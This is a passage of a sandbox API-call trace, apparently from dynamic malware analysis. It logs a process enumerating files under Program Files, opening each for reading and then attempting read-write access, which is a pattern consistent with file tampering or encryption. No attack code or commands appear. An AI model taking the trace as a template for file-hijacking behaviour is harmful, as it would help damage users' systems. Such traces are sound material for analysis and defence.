lpWideCharStr=0x0) returned 45 [0089.835] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71828 [0089.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71828, cchWideChar=45 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\skype.exe") returned 45 [0089.835] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\skype.exe" (normalized: "c:\\program files\\internet explorer\\skype.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.835] GetLastError () returned 0x20 [0089.835] GetLastError () returned 0x20 [0089.836] SetLastError (dwErrCode=0x20) [0089.836] GetLastError () returned 0x20 [0089.836] SetLastError (dwErrCode=0x20) [0089.836] GetLastError () returned 0x20 [0089.836] SetLastError (dwErrCode=0x20) [0089.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0089.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0089.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0089.836] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.836] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.836] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9b1003, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a9b1003, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a9b1003, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc218, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0089.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0089.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0089.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0089.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0089.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0089.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0089.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0089.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0089.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0089.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0089.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a4b0 [0089.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0089.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.836] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0089.836] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0089.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0089.837] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.837] AreFileApisANSI () returned 1 [0089.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\sqmapi.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\sqmapi.dll", lpUsedDefaultChar=0x0) returned 46 [0089.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0089.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.837] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0089.837] AreFileApisANSI () returned 1 [0089.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0089.837] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x717c0 [0089.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 46 [0089.837] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0089.840] GetFileType (hFile=0x420) returned 0x1 [0089.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0089.840] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.840] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.840] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.841] CloseHandle (hObject=0x420) returned 1 [0089.841] AreFileApisANSI () returned 1 [0089.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0089.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x719c8 [0089.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 46 [0089.841] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.841] GetLastError () returned 0x5 [0089.841] GetLastError () returned 0x5 [0089.841] SetLastError (dwErrCode=0x5) [0089.841] GetLastError () returned 0x5 [0089.841] SetLastError (dwErrCode=0x5) [0089.841] GetLastError () returned 0x5 [0089.841] SetLastError (dwErrCode=0x5) [0089.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0089.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0089.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.841] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.841] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17364140, ftCreationTime.dwHighDateTime=0x1d5b00e, ftLastAccessTime.dwLowDateTime=0xc03d9b40, ftLastAccessTime.dwHighDateTime=0x1d5d141, ftLastWriteTime.dwLowDateTime=0xc03d9b40, ftLastWriteTime.dwHighDateTime=0x1d5d141, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="thunderbird.exe", cAlternateFileName="THUNDE~1.EXE")) returned 1 [0089.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0089.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0089.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0089.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0089.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0089.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0089.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0089.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0089.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a430 [0089.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0089.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0089.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0089.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0089.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.842] AreFileApisANSI () returned 1 [0089.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\thunderbird.exe", lpUsedDefaultChar=0x0) returned 51 [0089.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0089.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.842] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0089.842] AreFileApisANSI () returned 1 [0089.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0089.843] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45e88 [0089.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\thunderbird.exe") returned 51 [0089.843] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\thunderbird.exe" (normalized: "c:\\program files\\internet explorer\\thunderbird.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0089.843] GetFileType (hFile=0x420) returned 0x1 [0089.843] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0089.843] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.843] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.843] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.844] CloseHandle (hObject=0x420) returned 1 [0089.844] AreFileApisANSI () returned 1 [0089.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0089.844] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46048 [0089.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x46048, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\thunderbird.exe") returned 51 [0089.844] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\thunderbird.exe" (normalized: "c:\\program files\\internet explorer\\thunderbird.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.844] GetLastError () returned 0x20 [0089.844] GetLastError () returned 0x20 [0089.844] SetLastError (dwErrCode=0x20) [0089.844] GetLastError () returned 0x20 [0089.844] SetLastError (dwErrCode=0x20) [0089.844] GetLastError () returned 0x20 [0089.844] SetLastError (dwErrCode=0x20) [0089.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0089.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0089.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.844] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0089.844] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.844] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.844] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x64, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x75c68, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x64, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="nd", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓㈀\x01⺊Ā")) returned 0 [0089.845] FindClose (in: hFindFile=0x78410 | out: hFindFile=0x78410) returned 1 [0089.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0089.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0089.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0089.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0089.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0089.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0089.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0089.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0089.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0089.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0089.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0089.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0089.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0089.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0089.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0089.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0089.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0089.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0089.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0089.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0089.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.845] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0089.845] AreFileApisANSI () returned 1 [0089.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java", lpUsedDefaultChar=0x0) returned 22 [0089.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.845] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.845] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0089.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0089.846] AreFileApisANSI () returned 1 [0089.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0089.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0089.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x4df50, cchWideChar=22 | out: lpWideCharStr="C:\\Program Files\\Java") returned 22 [0089.846] CreateFileW (lpFileName="C:\\Program Files\\Java" (normalized: "c:\\program files\\java"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.846] GetLastError () returned 0x5 [0089.846] GetLastError () returned 0x5 [0089.846] SetLastError (dwErrCode=0x5) [0089.846] GetLastError () returned 0x5 [0089.846] SetLastError (dwErrCode=0x5) [0089.846] GetLastError () returned 0x5 [0089.846] SetLastError (dwErrCode=0x5) [0089.846] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0089.846] AreFileApisANSI () returned 1 [0089.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0089.846] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e308 [0089.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x4e308, cchWideChar=22 | out: lpWideCharStr="C:\\Program Files\\Java") returned 22 [0089.846] CreateFileW (lpFileName="C:\\Program Files\\Java" (normalized: "c:\\program files\\java"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.846] GetLastError () returned 0x5 [0089.846] GetLastError () returned 0x5 [0089.847] SetLastError (dwErrCode=0x5) [0089.847] GetLastError () returned 0x5 [0089.847] SetLastError (dwErrCode=0x5) [0089.847] GetLastError () returned 0x5 [0089.847] SetLastError (dwErrCode=0x5) [0089.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0089.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0089.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0089.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, 